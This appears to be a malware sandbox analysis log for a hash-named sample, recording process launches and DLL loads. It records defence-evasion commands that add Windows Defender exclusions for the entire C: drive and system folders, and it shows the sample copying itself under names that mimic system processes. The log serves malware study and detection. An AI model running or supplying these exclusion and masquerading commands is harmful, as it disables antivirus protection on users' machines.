                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe "C:\Users\Public\Documents\My Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe"
                            Source: unknownProcess created: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe "C:\Users\Public\Documents\My Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe"
                            Source: unknownProcess created: C:\Users\user\Downloads\smartscreen.exe C:\Users\user\Downloads\smartscreen.exe
                            Source: unknownProcess created: C:\Users\user\Downloads\smartscreen.exe C:\Users\user\Downloads\smartscreen.exe
                            Source: unknownProcess created: C:\Recovery\WmiPrvSE.exe C:\Recovery\WmiPrvSE.exe
                            Source: unknownProcess created: C:\Recovery\WmiPrvSE.exe C:\Recovery\WmiPrvSE.exe
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zuwFoSPM2u.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe "C:\Program Files (x86)\mozilla maintenance service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe"
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: mscoree.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: apphelp.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: kernel.appcore.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: version.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: windows.storage.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: wldp.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: profapi.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: cryptsp.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: rsaenh.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: cryptbase.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: sspicli.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: ktmw32.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: ntmarta.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: wbemcomn.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: amsi.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: userenv.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: rasapi32.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: rasman.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: rtutils.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: mswsock.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: winhttp.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: ondemandconnroutehelper.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: iphlpapi.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: dhcpcsvc6.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: dhcpcsvc.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: dnsapi.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: winnsi.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: rasadhlp.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: fwpuclnt.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: secur32.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: schannel.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: mskeyprotect.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: ntasn1.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: ncrypt.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: ncryptsslp.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: msasn1.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: gpapi.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: uxtheme.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: windowscodecs.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: propsys.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: dlnashext.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: wpdshext.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: edputil.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: urlmon.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: iertutil.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: srvcli.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: netutils.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: windows.staterepositoryps.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: wintypes.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: appresolver.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: bcp47langs.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe Section loaded: slc.dll
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
